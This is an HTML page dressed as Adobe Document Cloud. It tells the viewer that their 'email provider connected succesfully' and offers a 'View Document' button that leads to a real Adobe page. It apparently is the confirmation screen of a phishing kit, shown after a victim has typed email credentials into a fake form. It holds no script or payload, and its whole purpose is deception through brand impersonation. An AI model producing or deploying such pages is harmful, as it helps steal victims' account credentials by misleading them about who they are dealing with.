<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign In</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
</head>

<body>
  <header></header>

  <div class="box-modal">
    <div class="overlay"></div>
    <div class="body-modal">
      <div class="card">
        <ul class="list-group list-group-flush">
          <li class="list-group-item" style="padding-top: 1.5rem;padding-bottom: 1.5rem;border: none;">
            <div class="card-header">
              <img src="/img/logo.png" alt="logo" class="card-header-icon">
              <h5 class="card-header-title">Adobe Document Cloud</h5>
            </div>

            <div class="card-body">
              <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="https://www.w3.org/2000/svg">
                <circle cx="32" cy="32" r="32" fill="#62CF66"></circle>
                <path fill-rule="evenodd" clip-rule="evenodd" d="M28.2514 44.0347C27.4541 44.9285 26.0553 44.9259 25.2614 44.0291L14.5907 31.9753C14.151 31.4787 14.3078 30.6995 14.9054 30.4116L15.3589 30.1931C15.686 30.0354 16.0729 30.0675 16.3695 30.2769L25.0794 36.423C25.8341 36.9556 26.8554 36.902 27.5502 36.2934L47.6139 18.7212C47.9155 18.4571 48.3457 18.3986 48.7068 18.5726L49.0901 18.7573C49.689 19.0458 49.8448 19.8277 49.4023 20.3238L28.2514 44.0347Z" fill="white"></path>
              </svg>
              <p class="card-header-text">Email provider connected succesfully. Visit the link below to view or edit document.</p>
              <div class="btn-group" style="justify-content: center;padding-top: 20px;">
                <a href="https://www.adobe.com/acrobat/online/extract-pdf-pages.html" class="btn" style="text-decoration: none;">View Document</a>
              </div>
            </div>
          </li>
        </ul>
      </div>
    </div>
  </div>
</body>

</html>
